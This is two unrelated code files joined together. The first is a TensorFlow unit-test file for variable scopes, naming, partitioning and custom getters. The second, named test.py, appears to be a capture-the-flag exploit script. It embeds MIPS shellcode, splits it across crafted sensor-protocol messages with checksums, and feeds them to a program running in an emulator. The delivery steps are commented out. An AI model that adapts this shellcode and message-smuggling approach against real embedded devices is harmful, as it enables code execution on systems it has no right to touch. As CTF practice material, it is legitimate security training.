with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer) as outer:
with variable_scope.variable_scope("tower", "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/tower/scope2/")
outer.reuse_variables()
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
def testVarOpScopeReuseError(self):
with self.test_session():
with self.assertRaises(ValueError):
with variable_scope.variable_scope(None, "default", reuse=True):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/tower/w:0")
def testVarOpScopeOuterScope(self):
with self.test_session():
with variable_scope.variable_scope("outer") as outer:
pass
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/scope2/")
outer.reuse_variables()
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_2/default/scope2/")
def testVarOpScopeNestedOuterScope(self):
with self.test_session():
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/outer/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer/default/scope2/")
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(variable_scope.get_variable("w", []).name, "outer/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/scope2/")
with variable_scope.variable_scope(None, "default", []):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
with ops.name_scope("scope2") as sc2:
self.assertEqual(sc2, "outer_1/default/scope2/")
def testBasicWhenAuxiliaryNameScopeIsFalse(self):
with self.test_session():
with variable_scope.variable_scope(
"scope", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w", []).name, "scope/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope(scope, auxiliary_name_scope=False):
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "scope/w1:0")
self.assertEqual(constant_op.constant([], name="c1").name, "c1:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("scope"):
self.assertEqual(constant_op.constant([], name="c").name, "scope/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
"inner", auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "outer/c:0")
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as inner1:
self.assertEqual(inner1.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w1", []).name, "outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
def testCreatedByDefaultNameWhenAuxiliaryNameScopeIsFalse(self):
with self.test_session():
with variable_scope.variable_scope(
None, default_name="default", auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(
variable_scope.get_variable("w", []).name, "default/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("default"):
self.assertEqual(constant_op.constant([], name="c").name, "default/c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
None, default_name="default", auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "outer/")
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/default/w:0")
self.assertEqual(constant_op.constant([], name="c").name, "outer/c:0")
# Recheck: new name scope is NOT created before
with ops.name_scope("default"):
self.assertEqual(
constant_op.constant([], name="c").name, "outer/default/c:0")
def testReenterRootScopeWhenAuxiliaryNameScopeIsFalse(self):
with self.test_session():
root_scope = variable_scope.get_variable_scope()
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as scope:
self.assertEqual(scope.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w", []).name, "w:0")
self.assertEqual(constant_op.constant([], name="c").name, "c:0")
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope(
root_scope, auxiliary_name_scope=False) as inner:
self.assertEqual(inner.original_name_scope, "")
self.assertEqual(variable_scope.get_variable("w1", []).name, "w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/c1:0")
def testAuxiliaryNameScopeIsInvalid(self):
with self.test_session():
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
None, default_name="scope", auxiliary_name_scope="invalid"):
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
"scope", auxiliary_name_scope="invalid"):
pass
with variable_scope.variable_scope("scope") as scope:
pass
with self.assertRaisesRegexp(TypeError, "auxiliary_name_scope"):
with variable_scope.variable_scope(
scope, auxiliary_name_scope="invalid"):
pass
def testReuseScopeWithoutNameScopeCollision(self):
# Github issue: #13429
with self.test_session():
with variable_scope.variable_scope("outer"):
with variable_scope.variable_scope("inner") as inner:
pass
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope:
with ops.name_scope(scope.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w", []).name, "outer/inner/w:0")
self.assertEqual(
constant_op.constant([], name="c").name, "outer/inner/c:0")
with ops.name_scope("inner"):
self.assertEqual(constant_op.constant([], name="c").name, "inner/c:0")
with variable_scope.variable_scope("another"):
with variable_scope.variable_scope(
inner, auxiliary_name_scope=False) as scope1:
with ops.name_scope(scope1.original_name_scope):
self.assertEqual(
variable_scope.get_variable("w1", []).name, "outer/inner/w1:0")
self.assertEqual(
constant_op.constant([], name="c1").name, "outer/inner/c1:0")
with ops.name_scope("inner"):
self.assertEqual(
constant_op.constant([], name="c").name, "another/inner/c:0")
@test_util.run_in_graph_and_eager_modes()
def testGetLocalVar(self):
# Check that local variable respects naming.
with variable_scope.variable_scope("outer") as outer:
with variable_scope.variable_scope(outer, "default", []):
local_var = variable_scope.get_local_variable(
"w", [], collections=["foo"])
self.assertEqual(local_var.name, "outer/w:0")
if not context.executing_eagerly():
# Since variable is local, it should be in the local variable collection
# but not the trainable collection.
self.assertIn(local_var,
ops.get_collection(ops.GraphKeys.LOCAL_VARIABLES))
self.assertIn(local_var, ops.get_collection("foo"))
self.assertNotIn(local_var,
ops.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES))
# Check that local variable respects `reuse`.
with variable_scope.variable_scope(outer, "default", reuse=True):
self.assertEqual(
variable_scope.get_local_variable("w", []).name, "outer/w:0")
def testGetVarWithDevice(self):
g = ops.Graph()
varname_type = []
def device_func(op):
if op.type in ["Variable", "VariableV2", "VarHandleOp"]:
varname_type.append((op.name, op.get_attr("dtype")))
return "/device:GPU:0"
with g.as_default():
with ops.device(device_func):
_ = variable_scope.get_variable("x", (100, 200))
_ = variable_scope.get_variable(
"y", dtype=dtypes.int64, initializer=numpy.arange(73))
self.assertEqual(varname_type[0], ("x", dtypes.float32))
self.assertEqual(varname_type[1], ("y", dtypes.int64))
def testGetCollection(self):
with self.test_session():
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
with variable_scope.variable_scope("testGetCollection_foo_") as scope1:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo_/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope1.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0"
])
with variable_scope.variable_scope("testGetCollection_foo") as scope2:
_ = variable_scope.get_variable("testGetCollection_a", [])
_ = variable_scope.get_variable(
"testGetCollection_b", [], trainable=False)
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], ["testGetCollection_foo/testGetCollection_a:0"])
self.assertEqual([
v.name
for v in scope2.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
scope = variable_scope.get_variable_scope()
self.assertEqual([
v.name for v in scope.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
], [
"testGetCollection_a:0", "testGetCollection_b:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_b:0",
"testGetCollection_foo/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_b:0"
])
self.assertEqual([
v.name
for v in scope.get_collection(ops.GraphKeys.TRAINABLE_VARIABLES)
], [
"testGetCollection_a:0",
"testGetCollection_foo_/testGetCollection_a:0",
"testGetCollection_foo/testGetCollection_a:0"
])
def testGetTrainableVariables(self):
with self.test_session():
_ = variable_scope.get_variable("testGetTrainableVariables_a", [])
with variable_scope.variable_scope(
"testGetTrainableVariables_foo") as scope:
_ = variable_scope.get_variable("testGetTrainableVariables_b", [])
_ = variable_scope.get_variable(
"testGetTrainableVariables_c", [], trainable=False)
self.assertEqual(
[v.name for v in scope.trainable_variables()],
["testGetTrainableVariables_foo/"
"testGetTrainableVariables_b:0"])
def testGetGlobalVariables(self):
with self.test_session():
_ = variable_scope.get_variable("testGetGlobalVariables_a", [])
with variable_scope.variable_scope("testGetGlobalVariables_foo") as scope:
_ = variable_scope.get_variable("testGetGlobalVariables_b", [])
self.assertEqual(
[v.name for v in scope.global_variables()],
["testGetGlobalVariables_foo/"
"testGetGlobalVariables_b:0"])
def testGetLocalVariables(self):
with self.test_session():
_ = variable_scope.get_variable(
"a", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
with variable_scope.variable_scope("foo") as scope:
_ = variable_scope.get_variable(
"b", [], collections=[ops.GraphKeys.LOCAL_VARIABLES])
_ = variable_scope.get_variable("c", [])
self.assertEqual([v.name for v in scope.local_variables()], ["foo/b:0"])
def testGetVariableWithRefDtype(self):
v = variable_scope.get_variable("v", shape=[3, 4], dtype=dtypes.float32)
# Ensure it is possible to do get_variable with a _ref dtype passed in.
_ = variable_scope.get_variable("w", shape=[5, 6], dtype=v.dtype)
def testTwoGraphs(self):
def f():
g1 = ops.Graph()
g2 = ops.Graph()
with g1.as_default():
with g2.as_default():
with variable_scope.variable_scope("_"):
pass
self.assertRaisesRegexp(ValueError, "'_' is not a valid scope name", f)
def axis0_into1_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
return part
def axis0_into2_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 2
return part
def axis0_into3_partitioner(shape=None, **unused_kwargs):
part = [1] * len(shape)
part[0] = 3
return part
class VariableScopeWithPartitioningTest(test.TestCase):
def testResultNameMatchesRequested(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v.name, "scope0/name0")
v_concat = v.as_tensor()
self.assertEqual(v_concat.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0/part_0:0", [x.name for x in variables])
self.assertIn("scope0/name0/part_1:0", [x.name for x in variables])
self.assertNotIn("scope0/name0/part_2:0", [x.name for x in variables])
def testBreaksIfPartitioningChanges(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into3_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
"Trying to reuse partitioned variable .* but specified partitions .* "
"and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into1_partitioner, reuse=True):
with self.assertRaisesRegexp(
ValueError,
"Trying to reuse partitioned variable .* but specified partitions .* "
"and found partitions .*"):
variable_scope.get_variable("name0", shape=(3, 1, 1))
def testReturnsExistingConcatenatedValueIfReuse(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v_concat = variable_scope.get_variable("name0", shape=(3, 1, 1))
variable_scope.get_variable_scope().reuse_variables()
v_concat_2 = variable_scope.get_variable("name0", shape=(3, 1, 1))
self.assertEqual(v_concat, v_concat_2)
def testAllowsReuseWithoutPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=(3, 1, 1))
with variable_scope.variable_scope("scope0", reuse=True):
v_reused = variable_scope.get_variable("name0")
self.assertEqual(v, v_reused)
def testPropagatePartitionerOnReopening(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner) as vs:
self.assertEqual(axis0_into2_partitioner, vs.partitioner)
with variable_scope.variable_scope(vs) as vs1:
self.assertEqual(axis0_into2_partitioner, vs1.partitioner)
def testScalarIgnoresPartitioner(self):
with variable_scope.variable_scope(
"scope0", partitioner=axis0_into2_partitioner):
v = variable_scope.get_variable("name0", shape=())
self.assertEqual(v.name, "scope0/name0:0")
variables = ops.get_collection(ops.GraphKeys.GLOBAL_VARIABLES)
self.assertIn("scope0/name0:0", [x.name for x in variables])
def _testPartitionConcatenatesAlongCorrectAxis(self, use_resource):
def _part_axis_0(**unused_kwargs):
return (2, 1, 1)
def _part_axis_1(**unused_kwargs):
return (1, 2, 1)
with variable_scope.variable_scope("root", use_resource=use_resource):
v0 = variable_scope.get_variable(
"n0", shape=(2, 2, 2), partitioner=_part_axis_0)
v1 = variable_scope.get_variable(
"n1", shape=(2, 2, 2), partitioner=_part_axis_1)
self.assertEqual(v0.get_shape(), (2, 2, 2))
self.assertEqual(v1.get_shape(), (2, 2, 2))
n0_0 = list(v0)[0]
n0_1 = list(v0)[1]
self.assertEqual(n0_0.get_shape(), (1, 2, 2))
self.assertEqual(n0_1.get_shape(), (1, 2, 2))
n1_0 = list(v1)[0]
n1_1 = list(v1)[1]
self.assertEqual(n1_0.get_shape(), (2, 1, 2))
self.assertEqual(n1_1.get_shape(), (2, 1, 2))
def testPartitionConcatenatesAlongCorrectAxis(self):
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=False)
def testPartitionConcatenatesAlongCorrectAxisResource(self):
self._testPartitionConcatenatesAlongCorrectAxis(use_resource=True)
class VariableScopeWithCustomGetterTest(test.TestCase):
def testNonCallableGetterFails(self):
with self.assertRaisesRegexp(ValueError, r"custom_getter .* not callable:"):
with variable_scope.variable_scope("scope0", custom_getter=3):
variable_scope.get_variable("name0")
with self.assertRaisesRegexp(ValueError, r"custom_getter .* not callable:"):
variable_scope.get_variable("name0", custom_getter=3)
def testNoSideEffectsWithIdentityCustomGetter(self):
called = [0]
def custom_getter(getter, *args, **kwargs):
called[0] += 1
return getter(*args, **kwargs)
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope("new_scope") as new_scope:
v3 = variable_scope.get_variable("v3", [1])
with variable_scope.variable_scope(
new_scope, reuse=True, custom_getter=custom_getter):
v4 = variable_scope.get_variable("v3", [1])
self.assertEqual(v, v2)
self.assertEqual(v3, v4)
self.assertEqual(3, called[0]) # skipped one in the first new_scope
def testCustomGetterWithReuse(self):
# Custom getter can choose to behave differently on reused variables.
def custom_getter(getter, *args, **kwargs):
var = getter(*args, **kwargs)
if kwargs["reuse"]:
# This can be used, e.g., for changing the caching device if needed.
return array_ops.identity(var, name="reused")
else:
return array_ops.identity(var, name="not_reused")
with variable_scope.variable_scope(
"scope", custom_getter=custom_getter) as scope:
v = variable_scope.get_variable("v", [1])
with variable_scope.variable_scope(scope, reuse=True):
v2 = variable_scope.get_variable("v", [1])
self.assertEqual(v.name, "not_reused:0")
self.assertEqual(v2.name, "reused:0")
def testGetterThatCreatesTwoVariablesAndSumsThem(self):
def custom_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/0" % name, *args, **kwargs)
g_1 = getter("%s/1" % name, *args, **kwargs)
with ops.name_scope("custom_getter"):
return g_0 + g_1
with variable_scope.variable_scope("scope", custom_getter=custom_getter):
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(2, len(true_vars))
self.assertEqual("scope/v/0:0", true_vars[0].name)
self.assertEqual("scope/v/1:0", true_vars[1].name)
self.assertEqual("custom_getter/add:0", v.name)
with self.test_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = sess.run([true_vars, v])
self.assertAllClose(np_v, sum(np_vars))
def testNestedCustomGetters(self):
def sum_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/sum_0" % name, *args, **kwargs)
g_1 = getter("%s/sum_1" % name, *args, **kwargs)
with ops.name_scope("sum_getter"):
return g_0 + g_1
def prod_getter(getter, name, *args, **kwargs):
g_0 = getter("%s/prod_0" % name, *args, **kwargs)
g_1 = getter("%s/prod_1" % name, *args, **kwargs)
with ops.name_scope("prod_getter"):
return g_0 * g_1
with variable_scope.variable_scope("prod_scope", custom_getter=prod_getter):
with variable_scope.variable_scope("sum_scope", custom_getter=sum_getter):
with variable_scope.variable_scope(
"inner_sum_scope", custom_getter=sum_getter):
# take sums of sums of products
v = variable_scope.get_variable("v", [1, 2, 3])
self.assertEqual([1, 2, 3], v.get_shape())
true_vars = variables_lib.trainable_variables()
self.assertEqual(8, len(true_vars))
template = (
"prod_scope/sum_scope/inner_sum_scope/v/sum_%d/sum_%d/prod_%d:0")
self.assertEqual(template % (0, 0, 0), true_vars[0].name)
self.assertEqual(template % (0, 0, 1), true_vars[1].name)
self.assertEqual(template % (0, 1, 0), true_vars[2].name)
self.assertEqual(template % (0, 1, 1), true_vars[3].name)
self.assertEqual(template % (1, 0, 0), true_vars[4].name)
self.assertEqual(template % (1, 0, 1), true_vars[5].name)
self.assertEqual(template % (1, 1, 0), true_vars[6].name)
self.assertEqual(template % (1, 1, 1), true_vars[7].name)
with self.test_session() as sess:
variables_lib.global_variables_initializer().run()
np_vars, np_v = sess.run([true_vars, v])
# take products of sums of products
self.assertAllClose(
np_v, (((np_vars[0] * np_vars[1]) + (np_vars[2] * np_vars[3])) + (
(np_vars[4] * np_vars[5]) + (np_vars[6] * np_vars[7]))))
def testVariableCreator(self):
variable_names = []
def creator_a(next_creator, **kwargs):
variable_names.append(kwargs.get("name", ""))
return next_creator(**kwargs)
def creator_b(next_creator, **kwargs):
kwargs["name"] = "forced_name"
return next_creator(**kwargs)
with variable_scope.variable_creator_scope(creator_a):
with variable_scope.variable_creator_scope(creator_b):
variable_scope.variable(1.0, name="one_name")
self.assertAllEqual(variable_names, ["forced_name"])
class PartitionInfoTest(test.TestCase):
def testConstructorChecks(self):
# Invalid arg types.
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=None, var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=None)
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape="foo", var_offset=[0, 1])
with self.assertRaises(TypeError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset="foo")
# full_shape and var_offset must have same length.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[0, 1], var_offset=[0])
# Offset must always be less than shape.
with self.assertRaises(ValueError):
variable_scope._PartitionInfo(full_shape=[1, 1], var_offset=[0, 1])
def testSingleOffset(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(4, partition_info.single_offset([1, 3]))
# Tests when the variable isn't partitioned at all.
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(0, partition_info.single_offset([9, 3]))
def testSingleSliceDim(self):
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
# Invalid shape.
with self.assertRaises(TypeError):
partition_info.single_slice_dim(None)
# Rank of shape differs from full_shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 2, 3])
# Shape is too large given var_offset (4+6 > 9).
with self.assertRaises(ValueError):
partition_info.single_slice_dim([6, 3])
# Multiple possible slice dim from shape.
with self.assertRaises(ValueError):
partition_info.single_slice_dim([1, 1])
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[0, 0])
self.assertEqual(1, partition_info.single_slice_dim([9, 2]))
partition_info = variable_scope._PartitionInfo(
full_shape=[9, 3], var_offset=[4, 0])
self.assertEqual(0, partition_info.single_slice_dim([2, 3]))
class VariableScopeMultithreadedTest(test.TestCase):
def testTwoThreadsDisjointScopeEntry(self):
def thread_fn(i, graph):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
# Any thread after the first one should fail to create variable
# with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
graph = ops.get_default_graph()
threads = [
threading.Thread(target=thread_fn, args=(
i,
graph,
)) for i in range(2)
]
threads[0].start()
# Allow thread 0 to finish before starting thread 1.
threads[0].join()
threads[1].start()
threads[1].join()
def testTwoThreadsNestedScopeEntry(self):
def thread_fn(i, graph, run_event, pause_event):
with graph.as_default():
with variable_scope.variable_scope("foo"):
if i == 0:
v = variable_scope.get_variable("v", [])
self.assertEquals("foo/v:0", v.name)
else:
# Any thread after the first one should fail to create variable
# with the same name.
with self.assertRaises(ValueError):
variable_scope.get_variable("v", [])
pause_event.set()
run_event.wait()
graph = ops.get_default_graph()
run_events = [threading.Event() for _ in range(2)]
pause_events = [threading.Event() for _ in range(2)]
threads = [
threading.Thread(
target=thread_fn, args=(i, graph, run_events[i], pause_events[i]))
for i in range(2)
]
# Start first thread.
threads[0].start()
pause_events[0].wait()
# Start next thread once the first thread has paused.
threads[1].start()
pause_events[1].wait()
# Resume both threads.
run_events[0].set()
run_events[1].set()
threads[0].join()
threads[1].join()
def testReenterMainScope(self):
def thread_fn(graph, main_thread_scope):
with graph.as_default():
# Variable created with main scope will have prefix "main".
with variable_scope.variable_scope(main_thread_scope):
with variable_scope.variable_scope("foo"):
v = variable_scope.get_variable("v", [])
self.assertEquals("main/foo/v:0", v.name)
# Variable created outside main scope will not have prefix "main".
with variable_scope.variable_scope("bar"):
v = variable_scope.get_variable("v", [])
self.assertEquals("bar/v:0", v.name)
graph = ops.get_default_graph()
with variable_scope.variable_scope("main") as main_thread_scope:
thread = threading.Thread(
target=thread_fn, args=(graph, main_thread_scope))
thread.start()
thread.join()
if __name__ == "__main__":
test.main()
|
test.py | #!/bin/python3
import subprocess
import time
import struct
import sys
import threading
import socket
import os
shellcode = b"\x04\x00\r4\x04\x00\x084\x00\xa2\t<\x00\x80)5\x00\xa3\n<$\x00J5\x00\x00\x0b4\x00\x00\"\x8d\x00\x00\x00\x00\x00\x00B\xad\x04\x00)%\x04\x00J%\x01\x00k%\xf9\xffm\x15\x00\x00\x00\x00\x00\xa3\x0c< \x00\x8c5\x00\x00\x88\xa1\xff\xff\x08!\xf0\xff\x00\x15\x00\x00\x00\x00\xff\xff\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00"
shellcode_part1 = shellcode[0:56]
shellcode_part2 = shellcode[56:]
shellcode_part2 += b'\x00' * (56-len(shellcode_part2))
ENABLE_SENSOR = 0x10
DISABLE_SENSOR = 0x20
SET_COEFFICIENTS1 = 0x31
SET_COEFFICIENTS2 = 0x32
SET_BIAS = 0x40
SET_TWO_POINTS = 0x50
UPDATE_FILTERS = 0x60
def receive_output(fsock):
while True:
data =fsock.stdout.read(16)
if len(data) == 0:
break
sys.stderr.write("received {} bytes of data\n".format(len(data)))
print(data,file=sys.stderr)
sys.stderr.flush()
def do_checksum(message):
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[60] = checksum & 0xff
return message
def send_coefficients(channel, messageType, coefficients):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = messageType
message[3] = 56
message[4:60] = coefficients
message = do_checksum(message)
# message[4:12] = struct.pack("d", 5.4319)
# message[12:20] = struct.pack("d", 1.0187)
# message[20:28] = struct.pack("d", 3.0187)
# message[28:36] = struct.pack("d", 2.0187)
# message[36:44] = struct.pack("d", 10.8769)
# message[44:52] = struct.pack("d", 0.3187)
# message[52:60] = struct.pack("d", 10.99187)
channel.stdin.write(message)
def send_bias(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = SET_BIAS
message[3] = 8
message[4:12] = struct.pack("d", 2.4319)
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[60] = checksum & 0xff
channel.stdin.write(message)
def send_two_points(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = SET_TWO_POINTS
message[3] = 16
message[4:12] = struct.pack("d", 500.4319)
message[12:20] = struct.pack("d", 10.8769)
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[60] = checksum & 0xff
channel.stdin.write(message)
def send_enable(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = ENABLE_SENSOR
message[3] = 0
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[60] = checksum & 0xff
channel.stdin.write(message)
def send_update(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = UPDATE_FILTERS
message[3] = 0
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
checksum = 0xff - (checksum & 0xff)
message[60] = checksum & 0xff
channel.stdin.write(message)
def send_disable(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = DISABLE_SENSOR
message[3] = 0
message = do_checksum(message)
channel.send(message)
def send_test(channel):
message = bytearray(b'\x00'*64)
print(len(message))
message[0] = 0xa5
message[1] = 0x5a
print(len(message))
message[2:54] = b'zABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxy'
print(len(message))
# message[3] = 0
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
print(len(message))
checksum = 0xff - (checksum & 0xff)
print(len(message))
message[63] = checksum & 0xff
channel.stdin.write(message)
def send_buffer(channel):
message = bytearray(b'\x00'*64)
message[0] = 0xa5
message[1] = 0x5a
message[2] = 0x70
message[3] = 0x00
message[4:20] = struct.pack("4I", 0xa01805a0, 0xa01805a0,0xa01805a0,0xa01805a0 )
checksum = 0
for i in range(0, 58):
checksum += message[i+2]
print(len(message))
checksum = 0xff - (checksum & 0xff)
print(len(message))
message[63] = checksum & 0xff
channel.stdin.write(message)
def main():
#if 'CHAL_HOST' in os.environ and 'CHAL_PORT' in os.environ:
# host = os.environ.get('CHAL_HOST')
# port = os.environ.get('CHAL_PORT')
# ticket = os.environ.get('TICKET', "")
#else:
# print('[ERROR] CHAL_HOST and CHAL_PORT environment variables are required')
# exit(-1)
#Get the host:port from LCM
# sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# sock.connect((host, int(port)))
# fsock = sock.makefile('rw')
# if len(ticket):
# line = fsock.readline()
# fsock.write(ticket + '\n')
# fsock.flush()
# child = subprocess.Popen(['docker', 'run', '--rm', '-i', '-e','FLAG=flag{12345678901234567890}','mongoose_mayhem:challenge'],0, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
child = subprocess.Popen(['./vmips', '-o', 'fpu', '-o', 'memsize=3000000','a.out.rom'], 0, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
time.sleep(1)
#th = threading.Thread(target=receive_output, args=(child,), daemon=False)
#th.start()
data = child.stdout.read(16)
print(data)
time.sleep(5)
# # send_test(child)
send_disable(child)
# time.sleep(1)
# # sys.stderr.write("disabling sensor readout\n")
# # time.sleep(5)
# sys.stderr.write("sending coefficients1\n")
# send_coefficients(child, SET_COEFFICIENTS1, shellcode_part1)
# time.sleep(1)
# sys.stderr.write("sending coefficients2\n")
# send_coefficients(child, SET_COEFFICIENTS2, shellcode_part2)
# time.sleep(1)
# sys.stderr.write("sending update\n")
# # send_update(child)
# send_buffer(child)
time.sleep(10)
